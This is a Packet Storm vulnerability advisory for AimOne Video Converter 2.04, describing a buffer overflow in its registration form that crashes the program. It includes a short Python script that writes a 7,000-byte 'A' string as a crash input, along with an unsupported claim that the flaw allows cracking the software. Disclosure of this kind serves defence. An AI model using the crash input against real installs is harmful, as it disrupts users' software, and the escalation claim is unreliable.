AimOne Video Converter version 2.04 Build 103 suffers from a buffer overflow vulnerability that can cause a denial of service condition.
f4212c7bfd6ea0458d878e8fb94d4d66e64d4ba9f95fa0767acb1c92728e7f82## Title: AimOne Video Converter V2.04 Build 103 - Buffer Overflow (DoS)
## Author: nu11secur1ty
## Date: 01.05.2023
## Vendor: https://aimone-video-converter.software.informer.com/,
http://www.aimonesoft.com/
## Software: https://aimone-video-converter.software.informer.com/download/?ca85d0
## Reference:
## Description:
The AimOne Video Converter V2.04 Build 103 suffers from buffer
overflow and local Denial of Service.
The registration form is not working properly and crashes the video converter.
When the attacker decides to register the product. This can allow him
to easily crack the software and do more bad things it depending on
the case.
## STATUS: HIGH Vulnerability - CRITICAL
[+] Exploit:
```Python
#!/usr/bin/python
# nu11secur1ty
print("WELCOME to the AIMONE Video Converter 2.04 Build 103 - Buffer
Overflow exploit builder...\n")
input("Press any key to build the exploit...\n")
buffer = "\x41" * 7000
try:
f=open("PoC.txt","w")
print("[+] Creating %s bytes exploit payload.." %len(buffer))
f.write(buffer)
f.close()
print("[+] The PoC file was created!")
except:
print("File cannot be created")
```
## Reproduce:
[href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/AimOne/AimOne-Video-Converter-V2.04-Build-103)
## Proof and Exploit:
[href](https://streamable.com/v1hvbf)
## Time spent
`00:35:00`
## Writing an exploit
`00:15:00`
© 2022 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed